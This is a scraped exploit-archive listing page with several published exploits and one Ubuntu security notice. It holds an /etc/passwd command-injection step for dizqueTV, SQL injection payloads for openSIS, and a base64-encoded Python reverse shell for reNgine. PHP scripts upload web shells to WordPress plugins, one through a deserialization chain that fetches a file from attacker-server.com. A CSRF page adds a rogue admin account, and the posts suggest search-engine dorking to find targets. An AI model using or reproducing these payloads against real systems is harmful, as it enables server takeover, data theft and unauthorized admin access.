dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

**dizqueTV 1.5.3 Remote Code Execution**

Posted Oct 3, 2024

Authored by Ahmed Said Saud Al-Busaidi

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution

SHA-256 | b18cb14167c97952ef1684789d6a48b83e5c1338a0677edc0b3eaef195497b45

Download | Favorite | View

**dizqueTV 1.5.3 Remote Code Execution**

    # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)# Date: 9/21/2024# Exploit Author: Ahmed Said Saud Al-Busaidi# Vendor Homepage: https://github.com/vexorian/dizquetv# Version: 1.5.3# Tested on: linuxPOC:## Vulnerability DescriptiondizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.## STEPS TO REPRODUCE1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"3. click on update4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

**File Tags**

*   ActiveX (933)
*   Advisory (87,037)
*   Arbitrary (17,123)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,049)
*   Code Execution (7,927)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,438)
*   DoS (25,312)
*   Encryption (2,395)
*   Exploit (54,379)
*   File Inclusion (4,278)
*   File Upload (1,026)
*   Firewall (822)
*   Info Disclosure (2,927)
*   Intrusion Detection (921)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,313)
*   Local (14,866)
*   Magazine (587)
*   Overflow (13,229)
*   Perl (1,435)
*   PHP (5,293)
*   Proof of Concept (2,415)
*   Protocol (3,753)
*   Python (1,664)
*   Remote (31,931)
*   Root (3,674)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,055)
*   Shell (3,310)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,739)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,135)
*   Web (10,147)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,308)
*   Other

**File Archives**

*   October 2024
*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,132)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,415)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,936)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,896)
*   UNIX (9,464)
*   UnixWare (188)
*   Windows (6,782)
*   Other

dizqueTV 1.5.3 Remote Code Execution

Ubuntu Security Notice 7052-1 - It was discovered that GNOME Shell mishandled extensions that fail to reload, possibly leading to extensions staying enabled on the lock screen. An attacker could possibly use this issue to launch applications, view sensitive information, or execute arbitrary commands. It was discovered that the GNOME Shell incorrectly handled certain keyboard inputs. An attacker could possibly use this issue to invoke keyboard shortcuts, and potentially other actions while the workstation was locked.

    ==========================================================================Ubuntu Security Notice USN-7052-1October 03, 2024gnome-shell vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTSSummary:Several security issues were fixed in GNOME Shell.Software Description:- gnome-shell: graphical shell for the GNOME desktopDetails:It was discovered that GNOME Shell mishandled extensions that fail toreload, possibly leading to extensions staying enabled on the lock screen.An attacker could possibly use this issue to launch applications, viewsensitive information, or execute arbitrary commands. (CVE-2017-8288)It was discovered that the GNOME Shell incorrectly handled certainkeyboard inputs. An attacker could possibly use this issue to invokekeyboard shortcuts, and potentially other actions while the workstationwas locked. (CVE-2019-3820)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS  gnome-shell                     3.18.5-0ubuntu0.3+esm1                                  Available with Ubuntu ProAfter a standard system update you need to restart your session to make allthe necessary changes.References:  https://ubuntu.com/security/notices/USN-7052-1  CVE-2017-8288, CVE-2019-3820

Ubuntu Security Notice USN-7052-1

openSIS version 9.1 suffers from a remote SQL injection vulnerability.

    # Exploit Title: openSIS 9.1 - SQLi (Authenticated)# Google Dork: intext:"openSIS is a product"# Date: 09.09.2024# Exploit Author: Devrim Dıragumandan (d0ub1edd)# Vendor Homepage: https://www.os4ed.com/# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1# Version: 9.1# Tested on: LinuxA SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1---    Parameter: X-Forwarded-For #1* ((custom) HEADER)    Type: boolean-based blind    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG    Type: error-based    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae--- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

openSIS 9.1 SQL Injection

reNgine version 2.2.0 suffers from an authenticated command injection vulnerability.

    # Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)# Date: 2024-09-29# Exploit Author: Caner Tercan# Vendor Homepage: https://rengine.wiki/# Software Link: https://github.com/yogeshojha/rengine# Version: v2.2.0# Tested on: macOSPOC : 1. Login the Rengine Platform2. Click the Scan Engine3. Modify any Scan Engine4. I modified nmap_cmd parameters on yml config5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.payload :'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  #’￼￼

reNgine 2.2.0 Command Injection

WordPress Bricks Builder Theme version 1.9.6 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : WordPress Bricks Builder Theme 1.9.6 php code injection Vulnerability                                                       |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |  
| # Vendor    : https://bricksbuilder.io/                                                                                                   |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 53 set your target.

[+] Line 45 set your commands.

[+] Line 68 set your path.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class MetasploitModule {

    private $info; // معلومات الوحدة  
    private $targetUri; // URI المستهدف

    // دالة لجلب الـ Nonce  
    private function fetchNonce() {  
        // تحقق مما إذا كانت targetUri مُعرفة  
        if (empty($this->targetUri['path'])) {  
            throw new Exception('Target URI path is not set.');  
        }

        // إرسال طلب GET لجلب الـ Nonce  
        $response = $this->sendRequest(['method' => 'GET', 'uri' => $this->targetUri['path']]);  
        // إذا كانت الاستجابة غير ناجحة، نرجع null  
        if ($response['code'] !== 200) return null;

        // استخدام التعبير النمطي لاستخراج الـ Nonce  
        preg_match('/"nonce":"([a-f0-9]+)"/', $response['body'], $matches);  
        return $matches ? $matches[1] : null; // إرجاع الـ Nonce أو null إذا لم يتم العثور عليه  
    }

    // دالة تنفيذ الاستغلال  
    public function exploit() {  
        // جلب الـ Nonce  
        $nonce = $this->fetchNonce();  
        if (!$nonce) {  
            throw new Exception('Failed to retrieve nonce. Exiting...'); // إذا فشل جلب الـ Nonce  
        }

        echo "Nonce retrieved: {$nonce}\n"; // طباعة الـ Nonce المستخرج

        // إعداد البيانات لإرسالها في الطلب  
        $data = [  
            'postId' => rand(1, 10000), // توليد معرف عشوائي  
            'nonce' => $nonce, // استخدام الـ Nonce المستخرج  
            'element' => [  
                'name' => 'code',  
                'settings' => [  
                    'executeCode' => 'true',  
                    'code' => "<?php payload ?>" // هنا يتم وضع الشيفرة التي سيتم تنفيذها  
                ]  
            ]  
        ];

        // إرسال الطلب POST لتنفيذ الاستغلال  
        $this->sendRequest([  
            'method' => 'POST',  
            'uri' => $this->targetUri['path'] . '/index.php', // URL المستهدف  
            'ctype' => 'application/json', // نوع المحتوى  
            'data' => json_encode($data), // تحويل البيانات إلى صيغة JSON  
            'vars_get' => ['rest_route' => '/bricks/v1/render_element'] // المعلمات الإضافية  
        ]);  
    }

    // دالة لمحاكاة الطلبات HTTP  
    private function sendRequest($options) {  
        // قم بتنفيذ منطق الطلب HTTP هنا  
        return ['code' => 200, 'body' => '{"nonce":"123456"}']; // استجابة مثال، يجب استبدالها بالمنطق الفعلي  
    }  
}

// الاستخدام  
$targetUri = ['path' => '/path/to/target']; // تعيين مسار الهدف هنا  
$module = new MetasploitModule([], $targetUri); // تمرير targetUri عند إنشاء الكائن  
try {  
    $module->exploit(); // محاولة تنفيذ الاستغلال  
} catch (Exception $e) {  
    echo $e->getMessage(); // طباعة رسالة الخطأ إذا حدثت  
}

?>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

WordPress Bricks Builder Theme 1.9.6 Code Injection

WordPress Hash Form plugin version 1.1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : WordPress Hash Form 1.1.0 php code injection Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://plugintests.com/plugins/wporg/hash-form/latest                                                                      |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 117 set your target.

[+] Line 111 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class WordPressHashFormRCE {  
    private $target_url;  
    private $nonce;

    public function __construct($target_url) {  
        $this->target_url = $target_url;  
    }

    public function check() {  
        if (!$this->isWordPressOnline()) {  
            return 'WordPress does not appear to be online.';  
        }

        $plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');

        if ($plugin_version === null) {  
            return 'Hash Form plugin does not appear to be installed.';  
        }

        if ($plugin_version === false) {  
            return 'Hash Form plugin is installed but the version is unknown.';  
        }

        if ($plugin_version !== '1.1.0') {  
            return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";  
        }

        return "Detected Hash Form plugin version: $plugin_version";  
    }

    public function exploit() {  
        echo "Attempting to retrieve nonce from the target...\n";  
        $this->nonce = $this->getNonce();

        if (!$this->nonce) {  
            die('Failed to retrieve the nonce necessary for file upload.');  
        }

        echo "Nonce retrieved: {$this->nonce}\n";  
        echo "Uploading PHP payload using the retrieved nonce...\n";

        $file_url = $this->uploadPhpFile();  
        if (!$file_url) {  
            die('Failed to upload the PHP payload. Check file permissions and server settings.');  
        }

        echo "PHP payload uploaded successfully to $file_url\n";  
        $this->triggerPayload($file_url);  
    }

    private function isWordPressOnline() {  
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
        return $response !== false;  
    }

    private function checkPluginVersion($plugin_name, $version) {  
        $response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");  
        if ($response === false) return null;

        preg_match('/"version":"([^"]+)"/', $response, $matches);  
        return $matches[1] ?? false;  // return the version or false if not found  
    }

    private function getNonce() {  
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
        if ($response === false) return null;

        preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);  
        return $matches[1] ?? null;  
    }

    private function uploadPhpFile() {  
        $file_content = $this->createPayload();  
        $file_name = strtolower(bin2hex(random_bytes(4))) . '.php';

        $response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [  
            'action' => 'hashform_file_upload_action',  
            'file_uploader_nonce' => $this->nonce,  
            'allowedExtensions[0]' => 'php',  
            'sizeLimit' => 1048576,  
            'qqfile' => $file_name,  
            'data' => $file_content  
        ]);

        $json_response = json_decode($response, true);  
        return $json_response['url'] ?? null;  
    }

    private function triggerPayload($url) {  
        echo "Triggering the payload...\n";  
        $this->sendRequest('GET', $url);  
    }

    private function sendRequest($method, $uri, $data = []) {  
        $url = $this->target_url . $uri;  
        $options = [  
            'http' => [  
                'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
                'method' => $method,  
                'content' => http_build_query($data),  
            ],  
        ];  
        $context = stream_context_create($options);  
        return @file_get_contents($url, false, $context);  
    }

    private function createPayload() {  
        // You can define your payload logic here, for now, we return a simple payload  
        $payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";  
        return base64_encode($payload);  
    }  
}

// استخدام الوحدة  
$target_url = 'http://target-wordpress-site.com';  
$exploit = new WordPressHashFormRCE($target_url);

// تحقق من الثغرة  
echo $exploit->check() . "\n";

// تنفيذ الاستغلال  
$exploit->exploit();

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

WordPress Hash Form 1.1.0 Code Injection

WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://givewp.com/                                                                                                         |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 78 set your file link.[+] Line 127. set your target.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass GiveWPExploit {    private $targetUrl;    private $headers;    public function __construct($targetUrl) {        $this->targetUrl = $targetUrl;        $this->headers = array(            'Content-Type: application/x-www-form-urlencoded'        );    }    public function check() {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));        if (!$response || $response['http_code'] != 200) {            echo "Failed to retrieve form list.\n";            return false;        }        $forms = json_decode($response['body'], true);        if (empty($forms)) {            echo "No forms found.\n";            return false;        }        echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";        return $forms;    }    public function exploit() {        $forms = $this->check();        if (!$forms) {            return;        }        $selectedForm = $forms[array_rand($forms)];        $validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);        if (!$validForm) {            echo "Failed to retrieve a valid form for exploitation.\n";            return;        }        echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";        $this->sendExploitRequest($validForm);    }    private function retrieveAndAnalyzeForm($formId) {        $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(            'action' => 'give_donation_form_nonce',            'give_form_id' => $formId        ));        if (!$response || $response['http_code'] != 200) {            return false;        }        $formData = json_decode($response['body'], true);        $giveFormId = $formId;        $giveFormHash = $formData['data'];        $givePriceId = '0'; // Default price ID        $giveAmount = '$10.00'; // Default amount        if (!$giveFormHash) {            return false;        }        return array(            'give_form_id' => $giveFormId,            'give_form_hash' => $giveFormHash,            'give_price_id' => $givePriceId,            'give_amount' => $giveAmount        );    }    private function sendExploitRequest($validForm) {        // URL of the malicious file to be fetched        $remoteFileUrl = 'http://attacker-server.com/malicious-file.php';        // Payload that uses file_get_contents to fetch the remote file        $payload = sprintf(            'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',            strlen($remoteFileUrl),            $remoteFileUrl        );        $data = array(            'give-form-id' => $validForm['give_form_id'],            'give-form-hash' => $validForm['give_form_hash'],            'give-price-id' => $validForm['give_price_id'],            'give-amount' => $validForm['give_amount'],            'give_first' => 'Test',            'give_last' => 'User',            'give_email' => 'test@example.com',            'give_title' => $payload,            'give-gateway' => 'offline',            'action' => 'give_process_donation'        );        $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);    }    private function sendRequest($method, $url, $data) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers),                'content' => http_build_query($data)            )        );        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === false) {            return false;        }        return array(            'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code            'body' => $result        );    }}// Usage$exploit = new GiveWPExploit('http://127.0.0.1');$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip                                                            |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code add new admin .[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass VICIdialExploit {    private $username;    private $password;    private $targetUri;    private $headers;    public function __construct($username, $password, $targetUri) {        $this->username = $username;        $this->password = $password;        $this->targetUri = $targetUri;        $this->headers = array(            'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)        );    }    public function check() {        $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');        if ($response['code'] != 200) {            return 'Unknown';        }        $version_info = $this->extractVersion($response['body']);        if (!$version_info) {            return 'Unknown';        }        $current_version = $this->compareVersion($version_info, '2.14-917a');        return ($current_version <= 0) ? 'Vulnerable' : 'Safe';    }    private function extractVersion($html) {        preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);        return isset($matches[0]) ? $matches[0] : null;    }    private function compareVersion($current, $vulnerable) {        return version_compare($current, $vulnerable);    }    public function exploit() {        $this->startService();        $this->authenticateAdmin();        $this->updateUserSettings();        $this->updateSystemSettings();        $campaignData = $this->createDummyCampaign();        $this->updateCampaignSettings($campaignData['id']);        $this->createDummyList($campaignData['list_name'], $campaignData['id']);        $phoneCreds = $this->fetchPhoneCredentials();        $this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);        $this->insertMaliciousRecording($phoneCreds['recording_extension']);        $this->deleteDummyCampaign($campaignData['id']);        $this->waitForCronJob();    }    private function startService() {        // Starting HTTP service logic    }    private function sendRequest($method, $url, $body = null) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers)            )        );        if ($body) {            $options['http']['content'] = http_build_query($body);        }        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        return array(            'code' => $http_response_header[0],            'body' => $result        );    }    private function authenticateAdmin() {        $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));        if ($response['code'] != 200) {            throw new Exception('Failed to authenticate with credentials.');        }        echo 'Authenticated successfully as user ' . $this->username;    }    private function updateUserSettings() {        $faker = new Faker\Generator();        $userSettings = array(            'ADD' => '4A',            'user' => $this->username,            'pass' => $this->password,            'full_name' => $faker->name,            'user_group' => 'ADMIN',            'phone_login' => $faker->userName,            'phone_pass' => $faker->password,            'active' => 'Y',            'vicidial_recording' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);        echo 'Updated user settings';    }    private function updateSystemSettings() {        // Fetching system settings logic and making changes    }    private function createDummyCampaign() {        $faker = new Faker\Generator();        $campaignId = rand(100000, 999999);        $listId = $campaignId + 1;        $campaignName = $faker->company;        $campaignSettings = array(            'ADD' => '21',            'campaign_id' => $campaignId,            'campaign_name' => $campaignName,            'user_group' => '---ALL---',            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Created dummy campaign ' . $campaignName;        return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);    }    private function updateCampaignSettings($campaignId) {        $campaignSettings = array(            'ADD' => '41',            'campaign_id' => $campaignId,            'active' => 'Y',            'auto_dial_level' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Updated dummy campaign settings';    }    private function createDummyList($listName, $campaignId) {        $listSettings = array(            'ADD' => '211',            'list_name' => $listName,            'campaign_id' => $campaignId,            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);        echo 'Created dummy list ' . $listName;    }    private function fetchPhoneCredentials() {        // Fetching phone credentials logic    }    private function agentPortalAuthentication($extension, $password, $campaignId) {        // Agent portal authentication logic    }    private function insertMaliciousRecording($recordingExtension) {        // Inserting malicious recording logic    }    private function deleteDummyCampaign($campaignId) {        $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));        echo 'Deleted dummy campaign ' . $campaignId;    }    private function waitForCronJob() {        // Waiting for cron job logic    }}// Usage example:$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');$exploit->check();$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ViciDial 2.0.5 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Vehicle Service Management System 1.0 CSRF Add Admin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/vservice/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Vehicle Service Management System 1.0 Cross Site Request Forgery

Transport Management System version 1.0 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Transport Management System 1.0 idor Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /newvehicle.php[+] http://127.0.0.1/Transport-Management/newvehicle.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#vulnerability